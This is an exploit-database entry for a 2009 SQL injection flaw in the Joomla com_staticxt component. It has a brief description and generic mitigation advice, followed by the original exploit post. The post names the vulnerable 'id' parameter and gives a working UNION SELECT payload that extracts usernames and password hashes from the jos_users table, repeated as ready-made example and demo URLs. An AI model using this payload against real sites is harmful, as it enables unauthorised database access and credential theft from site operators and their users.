header-logo
Suggest Exploit
vendor:
N/A
by:
Palyo34 & KroNicKq
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component (com_staticxt) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter. The malicious query can be used to extract sensitive information from the database such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

===================================================
Joomla Component (com_staticxt) SQL Injection Vulnerability
===================================================

Author : Palyo34 & KroNicKq

Homepage : http://www.1923turk.com

===================================================


[+] Vulnerable File :


http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]


[+] ExploiT :

union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users

jos_users--


[+] G00gle Dork : :S


[+] Example :

http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users


[+] Demo :

http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users


===================================================
...:: Onurlu Olmak Bir Ömür Sürer Artistlik Ýse One Minute ::...
===================================================

Greetz : 1923Turk All Users